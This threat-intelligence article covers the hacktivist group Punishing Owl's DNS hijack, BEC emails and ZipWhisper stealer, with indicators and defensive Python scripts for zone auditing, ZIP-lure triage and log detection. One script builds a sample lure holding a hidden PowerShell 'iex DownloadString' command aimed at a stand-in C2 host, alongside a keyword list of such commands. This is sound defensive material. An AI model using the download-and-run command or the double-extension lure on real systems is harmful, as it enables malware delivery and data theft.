Punishing Owl, a newly surfaced hacking group, claims to have gained access to the networks of a Russian state security organization. The group posted evidence on social media, including links to a duplicate stash of the files on Mega.nz and a data leak site (DLS) hosting stolen internal documents. It refers to itself in the plural and presents itself as a collective.
DNS Defacement and Hijacking Techniques

Punishing Owl went a step further by exploiting access to the victim's DNS zone. The group created a new subdomain, [REDACTED].ru, delegated it to a server in Brazil, and pointed the root domain at the same server. That server hosted a political manifesto denouncing the victim together with links to the stolen files.
The attackers also added a TLS certificate for the victim's domain, issued that same day. Control of the DNS zone is enough to pass domain validation, so such a certificate is accepted by browsers even though the victim never requested it.
To mimic the organization's mail services, they also opened SMTP and IMAP ports on the server.

DLS resource with the victim's files (Source: habr)

With the official site now redirecting visitors to the DLS, the victim's partners and clients learned of the breach directly. The post went up on a Friday at 18:37, timing that delays the victim's response over the weekend and maximizes exposure.
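The DNS side of the hijack described above can be caught by diffing periodic snapshots of the zone. The following is an added example, not code from the PT ESC report: it parses two constructed snapshots in "name type value" form (the shape of dig +noall +answer output or a zone export) and flags new names, delegations to nameservers outside an allowlist, and address records that leave the expected ranges. The zone name, nameservers and addresses are assumed; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for the victim's hosting and the attacker's server.

```python
"""Added example: diff two zone snapshots and flag changes matching the hijack pattern
(new subdomain delegated to a foreign nameserver, root domain repointed elsewhere).
All names, nameservers and addresses below are constructed, not from the report."""
import ipaddress

# What the zone is expected to look like (assumed for this example).
EXPECTED_NS = {"ns1.hosting.example.", "ns2.hosting.example."}
EXPECTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def parse_snapshot(lines):
    """Parse 'name type value' lines into {(name, type): {values}}.
    Blank lines and ';' comments are skipped; names and values are lower-cased."""
    snap = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        name, rtype, value = line.split()
        snap.setdefault((name.lower(), rtype.upper()), set()).add(value.lower())
    return snap


def in_expected_net(value):
    """True if value is an IP address inside one of EXPECTED_NETS."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return False
    return any(addr in net for net in EXPECTED_NETS)


def audit(previous, current):
    """Return (name, finding, value) tuples for: names that did not exist before,
    NS records pointing outside EXPECTED_NS, A/AAAA records outside EXPECTED_NETS."""
    findings = []
    known = {name for name, _ in previous}
    reported_new = set()
    for (name, rtype), values in current.items():
        if name not in known and name not in reported_new:
            reported_new.add(name)
            findings.append((name, "new name in zone", rtype))
        # Only records added since the previous snapshot are judged.
        for v in sorted(values - previous.get((name, rtype), set())):
            if rtype == "NS" and v not in EXPECTED_NS:
                findings.append((name, "delegated to unexpected nameserver", v))
            elif rtype in ("A", "AAAA") and not in_expected_net(v):
                findings.append((name, "address outside expected ranges", v))
    return findings


# Constructed snapshots: before and after the hijack.
BEFORE = """
; zone as of last week
victim.example.      A   203.0.113.10
victim.example.      NS  ns1.hosting.example.
victim.example.      NS  ns2.hosting.example.
www.victim.example.  A   203.0.113.10
""".splitlines()

AFTER = """
; zone today: root repointed, new subdomain delegated away
victim.example.      A   198.51.100.7
victim.example.      NS  ns1.hosting.example.
victim.example.      NS  ns2.hosting.example.
www.victim.example.  A   203.0.113.10
leak.victim.example. NS  ns.attacker-host.example.
""".splitlines()


def run_audit():
    return audit(parse_snapshot(BEFORE), parse_snapshot(AFTER))


if __name__ == "__main__":
    for name, finding, value in run_audit():
        print(f"{name:24} {finding:36} {value}")
```

Run it from a scheduled job against the zone's authoritative answers or the registrar's zone export. The same-day certificate is a separate signal: a Certificate Transparency monitor on the domain raises it even when the DNS records look unchanged, and registrar and zone accounts should be restricted to named administrators with MFA.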
Indicator: Details
DLS server: Brazilian IP hosting the stolen files, the manifesto and the attacker-obtained TLS certificate
Hijacked subdomain: [REDACTED].ru (DNS delegated to Brazil)
Services: IMAP/SMTP ports active on the DLS server

BEC Follow-Up Attacks

A few days later, Punishing Owl targeted the victim's partners with business email compromise (BEC) style emails. The first wave came from punishingowl@[REDACTED], sent through the Brazilian server, announcing the breach and linking to the hijacked subdomain. An hour later, a second wave spoofed the address of a victim employee.
Those emails demanded immediate review of password-protected ZIP archives said to contain "confirming documents."

Punishing Owl Targets Russia (Source: habr)

The message headers pointed back to the same Brazilian server and disclosed the group's email address, punishingowl@atomicmail[.]io. Inside the ZIPs, a double extension disguised an LNK shortcut as a PDF: Windows hides the .lnk extension by default, so a file named with .pdf.lnk is displayed as a PDF.
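Because the lure relies on nothing more than a double extension over a Windows shortcut, a mail gateway or triage script can reject it before the LNK ever runs. The following added example (not from the report or the group's tooling) builds a constructed ZIP in memory, with a minimal LNK-shaped entry named Confirming_documents.pdf.lnk, and inspects every entry for three signs: a document extension sitting in front of an executable one, the ShellLink header bytes, and PowerShell download/execution keywords in either 8-bit or UTF-16LE text. The file names, command line and C2 URL in the sample are assumptions.

```python
"""Added example: triage a ZIP attachment for the double-extension LNK lure.
The archive and its contents are constructed here; the LNK blob is header-only
and is not a working shortcut."""
import io
import os
import zipfile

# ShellLink header: HeaderSize 0x4C followed by CLSID {00021401-0000-0000-C000-000000000046}.
LNK_HEADER = bytes.fromhex("4c000000") + bytes.fromhex("0114020000000000c000000000000046")
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf"}
EXEC_EXTS = {".lnk", ".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd"}
PS_INDICATORS = ["powershell", "pwsh", "-w hidden", "-windowstyle hidden", "-enc",
                 "iex", "downloadstring", "invoke-webrequest", "frombase64string"]


def powershell_hits(data):
    """Search both 1-byte and UTF-16LE views; LNK stores its arguments as UTF-16LE."""
    hay = data.decode("latin-1").lower() + "\n" + data.decode("utf-16le", "ignore").lower()
    return [ind for ind in PS_INDICATORS if ind in hay]


def inspect_entry(name, data):
    """Return the list of reasons an archive entry looks like the lure (empty if clean)."""
    reasons = []
    stem, ext = os.path.splitext(name.lower())
    inner_ext = os.path.splitext(stem)[1]
    if ext in EXEC_EXTS and inner_ext in DOC_EXTS:
        reasons.append(f"double extension: {inner_ext} lure over {ext}")
    if data.startswith(LNK_HEADER):  # catches LNK content even under an honest-looking name
        reasons.append("LNK (Windows shortcut) header")
    hits = powershell_hits(data)
    if hits:
        reasons.append("PowerShell indicators: " + ", ".join(hits))
    return reasons


def analyze_zip(zip_bytes, password=None):
    """Inspect every file entry; password is the ZIP password quoted in the lure email, if any."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            data = z.read(info.filename, pwd=password)
            reasons = inspect_entry(info.filename, data)
            if reasons:
                if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                    reasons.append("entry is password-protected")
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def build_sample_archive():
    """Constructed lure: LNK header, padding, then a UTF-16LE PowerShell command line,
    stored under a document-looking double extension next to a harmless text file."""
    cmd = ('powershell -w hidden -c "iex (New-Object Net.WebClient)'
           ".DownloadString('http://c2.example/stage')\"")  # assumed C2 URL
    lnk = LNK_HEADER + b"\x00" * 56 + cmd.encode("utf-16le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Confirming_documents.pdf.lnk", lnk)
        z.writestr("readme.txt", "Please review the attached documents.")
    return buf.getvalue()


if __name__ == "__main__":
    for f in analyze_zip(build_sample_archive()):
        print(f["name"])
        for r in f["reasons"]:
            print("  -", r)
```

The real lure arrives password-protected, so the gateway has to extract the password from the message body (or quarantine on the mere combination of encrypted ZIP and LNK entry). The keyword list is deliberately short; substring matches such as "iex" inside ordinary prose are possible, which is why the double extension and header checks carry the decision.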
When opened, the shortcut ran a hidden PowerShell command that fetched the ZipWhisper stealer from the C2 server bloggoversikten[.]com (82.221.100[.]40). ZipWhisper collects browser data, packs it into archives named [USERNAME]-home-part[CHUNK].zip under AppData\Local\Temp, and uploads the chunks to /upload/[COMPUTERNAME]/[USERNAME] on the C2. A "generated at" timestamp left in one sample's code suggests the script was produced with an AI coding tool.
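The staging file names and upload path above are stable enough to detect. This added example (not the report's or PT ESC's own detection logic) runs three checks over constructed proxy and endpoint log lines whose formats, host names and user names are assumptions: contact with the C2 domain or IP from the report, POST requests whose path matches /upload/<COMPUTERNAME>/<USERNAME>, and creation of <USERNAME>-home-part<N>.zip under AppData\Local\Temp. It then raises a proxy alert to critical when the same host and user also staged chunks.

```python
"""Added example: ZipWhisper detection over constructed proxy and endpoint logs.
Log formats, client addresses, host names and user names are assumptions."""
import re

# IOCs from the report (defanged there as bloggoversikten[.]com and 82.221.100[.]40).
C2_HOSTS = {"bloggoversikten.com", "82.221.100.40"}

# Upload path shape from the report: /upload/[COMPUTERNAME]/[USERNAME]
UPLOAD_RE = re.compile(r"^/upload/(?P<host>[^/\s?]+)/(?P<user>[^/\s?]+)/?$")
# Staging archive shape from the report: [USERNAME]-home-part[CHUNK].zip in Local\Temp
CHUNK_RE = re.compile(
    r"(?i)\\AppData\\Local\\Temp\\(?P<user>[^\\]+)-home-part(?P<chunk>\d+)\.zip$")


def scan_proxy(lines):
    """Lines shaped 'ts client method host path status bytes' (constructed format)."""
    alerts = []
    for line in lines:
        ts, client, method, host, path, _status, _size = line.split()
        m = UPLOAD_RE.match(path)
        base = {"ts": ts, "client": client,
                "host": m.group("host") if m else None,
                "user": m.group("user") if m else None}
        if host in C2_HOSTS:
            alerts.append({"rule": "c2-contact", "severity": "high", **base})
        elif method == "POST" and m:
            # Path shape alone: the C2 domain can change, the stealer's URL scheme may not.
            alerts.append({"rule": "zipwhisper-upload-path", "severity": "medium", **base})
    return alerts


def scan_endpoint(lines):
    """Lines shaped 'ts computer event path' (constructed format)."""
    alerts = []
    for line in lines:
        ts, computer, event, path = line.split(maxsplit=3)
        m = CHUNK_RE.search(path)
        if event == "FileCreate" and m:
            alerts.append({"rule": "zipwhisper-staging", "severity": "medium", "ts": ts,
                           "host": computer, "user": m.group("user"),
                           "chunk": int(m.group("chunk"))})
    return alerts


def correlate(proxy_alerts, endpoint_alerts):
    """Escalate a proxy alert when the host/user in its upload path also staged chunks."""
    staged = {(a["host"].lower(), a["user"].lower()) for a in endpoint_alerts}
    for a in proxy_alerts:
        if a["host"] and (a["host"].lower(), a["user"].lower()) in staged:
            a["severity"] = "critical"
    return proxy_alerts


# Constructed sample logs.
PROXY_LOG = [
    "2025-12-16T10:02:11Z 10.0.0.23 GET www.example.org /news/index.html 200 5120",
    "2025-12-16T10:02:40Z 10.0.0.23 POST bloggoversikten.com /upload/WS-0412/i.petrov 200 2107344",
    "2025-12-16T10:03:05Z 10.0.0.41 POST files.partner.example /upload/WS-0199/a.smirnova 201 88213",
]
ENDPOINT_LOG = [
    r"2025-12-16T10:01:58Z WS-0412 FileCreate C:\Users\i.petrov\AppData\Local\Temp\i.petrov-home-part3.zip",
    r"2025-12-16T10:02:00Z WS-0412 FileCreate C:\Users\i.petrov\Documents\report.docx",
]


def run():
    endpoint_alerts = scan_endpoint(ENDPOINT_LOG)
    proxy_alerts = correlate(scan_proxy(PROXY_LOG), endpoint_alerts)
    return proxy_alerts, endpoint_alerts


if __name__ == "__main__":
    for a in (*run()[0], *run()[1]):
        print(a)
```

The path-shape rule on its own is medium confidence because other software also uploads under per-host/per-user paths; the archive name in Temp and the C2 indicators are what turn it into a confident detection, and the correlation step ties the endpoint and network views of the same theft together.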
The C2 domain formerly belonged to a legitimate Russian tech blog that was active until 2015; it was re-registered in 2025 for these attacks.
IOC Type: Value
C2 domain: bloggoversikten[.]com
C2 IP: 82.221.100[.]40
Payload chain: ZIP > LNK > PowerShell (ZipWhisper stealer)
Upload path: /upload/[HOST]/[USER]
Group email: punishingowl@atomicmail[.]io

Punishing Owl targets only Russian critical infrastructure, including state agencies, research firms and IT companies. Between December 12 and 19, 2025, the group set up new social media accounts, dark web forum accounts and online service profiles, the pattern of a new player establishing its brand.

Russia Is the Target of Punishing Owl (Source: habr)

One of the social accounts geolocates to Kazakhstan. The group has even published a graph of its victims.
Given today's tense geopolitics, PT ESC expects more politically motivated hacktivists to target Russian cyberspace. Punishing Owl's custom tooling, prolonged stealth and dark web branding signal staying power, not a one-off stunt. PT ESC's Threat Intelligence team will continue tracking the group through PT Fusion.
Defenders should hunt for stealer activity, harden DNS controls (registrar and zone access), and watch for unexpected subdomains, delegations and newly issued certificates for their domains.